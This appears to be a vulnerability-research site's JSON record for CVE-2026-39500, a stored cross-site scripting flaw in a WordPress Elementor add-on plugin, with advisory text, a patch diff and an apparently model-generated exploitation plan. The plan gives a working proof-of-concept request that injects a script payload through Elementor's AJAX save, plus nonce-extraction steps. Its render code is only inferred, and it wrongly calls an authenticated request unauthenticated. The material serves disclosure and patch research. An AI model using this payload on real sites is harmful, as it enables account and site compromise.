[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fvTiOD0bPTvQkltFQfkOBk0d5b6oJE0Fo4JpgqNCNSzg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-39500","themesflat-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-7","themesflat-addons-for-elementor \u003C= 2.3.2 - Authenticated (Contributor+) Stored Cross-Site Scripting","The themesflat-addons-for-elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","themesflat-addons-for-elementor",null,"\u003C=2.3.2","2.3.3","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-23 00:00:00","2026-04-15 21:11:08",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa1da201f-47e3-4f39-9c8b-cd842e8f7ca5?source=api-prod",24,[22,23,24],"readme.txt","themesflat-addons-for-elementor.php","widgets\u002Fwidget-accordion.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-39500\n\n## 1. Vulnerability Summary\nThe **Themesflat Addons For Elementor** plugin (up to v2.3.2) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin registers various Elementor widgets (e.g., `tfaccordion`, `tf-imagebox`) but fails to sanitize or escape user-provided settings\u002Fparameters in the `render()` method of these widgets. \n\nAn attacker with **Contributor-level** permissions (who can create\u002Fedit posts using Elementor) can inject arbitrary JavaScript into a widget's control fields (like titles, content, or links). When the page is rendered for any visitor (including administrators), the script executes in their browser context.\n\n## 2. Attack Vector Analysis\n* **Endpoint**: `wp-admin\u002Fadmin-ajax.php` (via Elementor's `save_builder_data` action).\n* **Vulnerable Action**: `elementor_ajax`.\n* **Vulnerable Parameter**: The `settings` object within the `_elementor_data` post meta, specifically fields like `list_title` or `list_content` in the `tfaccordion` widget.\n* **Authentication**: Contributor+ (Authenticated).\n* **Preconditions**: \n 1. Elementor plugin must be active.\n 2. Attacker must have credentials for a user with the `edit_posts` capability.\n\n## 3. Code Flow\n1. **Registration**: The plugin registers widgets in `ThemesFlat_Addon_For_Elementor_Free::init_widgets` (hooked to `elementor\u002Fwidgets\u002Fregister`).\n2. **Widget Definition**: In `widgets\u002Fwidget-accordion.php`, the class `TFAccordion_Widget_Free` defines controls via `register_controls()`.\n * A repeater field is created: `$repeater = new \\Elementor\\Repeater();`.\n * The `list_title` control is added: `$repeater->add_control( 'list_title', [...] );`.\n3. **Storage**: When a Contributor saves an Elementor page, the data is sent to `admin-ajax.php` and stored in the database as a JSON-encoded string in the `_elementor_data` post meta key.\n4. **Sink (Rendering)**: The `render()` method (found in `widgets\u002Fwidget-accordion.php`, though truncated in source) retrieves these settings via `$this->get_settings_for_display()`. It then iterates through the repeater items and outputs them.\n * **Vulnerable Pattern**: `echo $item['list_title'];` instead of `echo esc_html($item['list_title']);`.\n\n## 4. Nonce Acquisition Strategy\nElementor uses its own nonce system for AJAX saves. To obtain a valid nonce as a Contributor:\n\n1. **Create a Post**: Create a standard post\u002Fpage first to get a valid `post_id`.\n2. **Open Editor**: Navigate the browser to the Elementor editor URL for that post: `\u002Fwp-admin\u002Fpost.php?post=[POST_ID]&action=elementor`.\n3. **Extract Nonce**: The nonce required for `elementor_ajax` is stored in the global JavaScript object `elementorCommonConfig`.\n4. **JavaScript Extraction**:\n * Variable: `window.elementorCommonConfig.ajax.nonce`\n * Alternative: `window.elementorConfig.ajax.nonce` (depending on Elementor version).\n\n## 5. Exploitation Strategy\n### Step 1: Authentication & Setup\n1. Login as a Contributor user.\n2. Identify a target post ID or create a new one.\n\n### Step 2: Extract Elementor Nonce\nUse the `browser_navigate` and `browser_eval` tools:\n* Navigate to: `http:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fpost.php?post=[ID]&action=elementor`\n* Execute: `browser_eval(\"window.elementorCommonConfig.ajax.nonce\")`\n\n### Step 3: Inject Stored XSS\nSend an HTTP POST request to `admin-ajax.php` to update the post's builder data.\n\n* **URL**: `http:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Method**: `POST`\n* **Content-Type**: `application\u002Fx-www-form-urlencoded`\n* **Parameters**:\n * `action`: `elementor_ajax`\n * `_nonce`: `[EXTRACTED_NONCE]`\n * `actions`: A JSON object containing the save command:\n ```json\n {\n \"save_builder_data\": {\n \"action\": \"save_builder_data\",\n \"data\": {\n \"status\": \"publish\",\n \"elements\": [\n {\n \"id\": \"exploit-id\",\n \"elType\": \"widget\",\n \"widgetType\": \"tfaccordion\",\n \"settings\": {\n \"list\": [\n {\n \"list_title\": \"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\",\n \"list_content\": \"Vulnerable Content\",\n \"set_active\": \"active\"\n }\n ]\n }\n }\n ]\n }\n }\n }\n ```\n * `post_id`: `[POST_ID]`\n\n### Step 4: Trigger Execution\nNavigate to the frontend URL of the post (`\u002F?p=[POST_ID]`). The script in `list_title` will execute.\n\n## 6. Test Data Setup\n1. **Plugin Version**: Ensure `themesflat-addons-for-elementor` version is `2.3.2`.\n2. **Contributor User**:\n * `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n3. **Target Post**:\n * `wp post create --post_type=post --post_status=publish --post_title=\"XSS Test\" --post_author=[ATTACKER_ID]`\n4. **Note**: Elementor must have \"Post\" enabled in its settings (default) to edit this post.\n\n## 7. Expected Results\n* The `admin-ajax.php` request should return a `200 OK` with a JSON response containing `\"success\":true`.\n* Upon visiting the post frontend, an alert box showing the document domain should appear.\n* The HTML source of the page will contain the raw payload: `\u003Cdiv class=\"title\">...\u003Cscript>alert(document.domain)\u003C\u002Fscript>...\u003C\u002Fdiv>`.\n\n## 8. Verification Steps\n1. **Check Database**: Use WP-CLI to inspect the stored meta:\n * `wp post meta get [POST_ID] _elementor_data`\n * Verify the JSON contains the `\u003Cscript>` payload.\n2. **Verify Frontend Output**:\n * `curl -s \"http:\u002F\u002F[TARGET]\u002F?p=[POST_ID]\" | grep \"\u003Cscript>alert\"`\n * Confirm the output is NOT escaped (e.g., NOT `<script>`).\n\n## 9. Alternative Approaches\n* **Widget Variation**: If `tfaccordion` is patched or unavailable, target the `tf-imagebox` widget (Image Box).\n * Vulnerable field in `tf-imagebox`: `title_text`.\n * `widgetType`: `tf-imagebox`.\n* **Bypass Nonce**: If the Elementor AJAX nonce is difficult to retrieve, a Contributor can try to inject the payload via the standard `save_post` hook by sending the `_elementor_data` parameter in a regular post update request (`post.php`), although Elementor often requires its own editor hooks to update this specific meta key.","The Themesflat Addons For Elementor plugin (up to v2.3.2) is vulnerable to Authenticated Stored Cross-Site Scripting (XSS). This occurs because the plugin's Elementor widgets, such as the Accordion and Image Box, fail to sanitize and escape user-provided settings like titles and content in their render methods, allowing contributors to execute scripts in other users' browsers.","\u002F\u002F widgets\u002Fwidget-accordion.php\n\n\u002F\u002F Control registration\n$repeater->add_control( 'list_title', [\n 'label' => esc_html__( 'Nav text', 'themesflat-addons-for-elementor' ),\n 'type' => \\Elementor\\Controls_Manager::TEXT,\n 'default' => esc_html__( 'Accordion Title', 'themesflat-addons-for-elementor' ),\n 'placeholder' => esc_html__( 'Type your title here', 'themesflat-addons-for-elementor' ),\n] );\n\n---\n\n\u002F\u002F widgets\u002Fwidget-accordion.php (inferred sink in render method)\nprotected function render() {\n $settings = $this->get_settings_for_display();\n if ( $settings['list'] ) {\n foreach ( $settings['list'] as $index => $item ) {\n \u002F\u002F ... (truncated)\n echo $item['list_title']; \u002F\u002F Vulnerable: Output not escaped\n }\n }\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthemesflat-addons-for-elementor\u002F2.3.2\u002Fthemesflat-addons-for-elementor.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthemesflat-addons-for-elementor\u002F2.3.3\u002Fthemesflat-addons-for-elementor.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthemesflat-addons-for-elementor\u002F2.3.2\u002Fthemesflat-addons-for-elementor.php\t2025-12-18 08:20:30.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fthemesflat-addons-for-elementor\u002F2.3.3\u002Fthemesflat-addons-for-elementor.php\t2026-03-13 02:38:20.000000000 +0000\n@@ -4,13 +4,13 @@\n Description: The theme's components\n Author: Themesflat\n Author URI: http:\u002F\u002Fthemesflat-addons.com\u002F\n-Version: 2.3.2\n+Version: 2.3.3\n Text Domain: themesflat-addons-for-elementor\n Domain Path: \u002Flanguages\n \n-WC tested up to: 10.4\n-Elementor tested up to: 3.33\n-Elementor Pro tested up to: 3.33\n+WC tested up to: 10.6\n+Elementor tested up to: 3.35\n+Elementor Pro tested up to: 3.35\n \n License: GPLv2 or later\n License URI: https:\u002F\u002Fwww.gnu.org\u002Flicenses\u002Fgpl-2.0.html\n@@ -1854,11 +1741,15 @@\n }\n \n public function get_posts_by_conditions( $post_type, $option ) {\n- global $wpdb;\n- global $post;\n+ global $wpdb, $post;\n \n- $post_type = $post_type ? esc_sql( $post_type ) : esc_sql( $post->post_type );\n+ \u002F\u002F fallback post_type\n+ $post_type = $post_type ? sanitize_key( $post_type ) : ( isset( $post->post_type ) ? sanitize_key( $post->post_type ) : '' );\n+ if ( empty( $post_type ) ) {\n+ return [];\n+ }\n \n+ \u002F\u002F cache\n if ( is_array( self::$current_page_data ) && isset( self::$current_page_data[ $post_type ] ) ) {\n return apply_filters( 'tfhf_get_display_posts_by_conditions', self::$current_page_data[ $post_type ], $post_type );\n }\n@@ -1867,99 +1758,130 @@\n \n self::$current_page_data[ $post_type ] = array();\n \n- $option['current_post_id'] = self::$current_page_data['ID'];\n+ \u002F\u002F meta option post (giữ nguyên logic cũ)\n+ $option['current_post_id'] = isset( self::$current_page_data['ID'] ) ? self::$current_page_data['ID'] : false;\n $meta_header = self::get_meta_option_post( $post_type, $option );\n \n if ( false === $meta_header ) {\n-\n- $current_post_type = esc_sql( get_post_type() );\n+ $current_post_type = sanitize_key( get_post_type() );","The exploit is carried out by an authenticated user with Contributor-level permissions (the `edit_posts` capability). First, the attacker logs into the WordPress dashboard and identifies a post they can edit with Elementor. They then extract a valid Elementor AJAX nonce, typically found in the global `elementorCommonConfig` JavaScript object within the editor. Using this nonce, the attacker sends an unauthenticated `POST` request to `wp-admin\u002Fadmin-ajax.php` with the action `elementor_ajax` and the `save_builder_data` command. The payload is placed inside the `settings` object of a widget (e.g., `tfaccordion` or `tf-imagebox`), specifically in fields like `list_title`. When any user, including an administrator, views the published post, the injected script executes in their browser context.","gemini-3-flash-preview","2026-04-17 23:35:31","2026-04-17 23:35:58",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","2.3.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthemesflat-addons-for-elementor\u002Ftags\u002F2.3.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fthemesflat-addons-for-elementor.2.3.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthemesflat-addons-for-elementor\u002Ftags\u002F2.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fthemesflat-addons-for-elementor.2.3.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthemesflat-addons-for-elementor\u002Ftags"]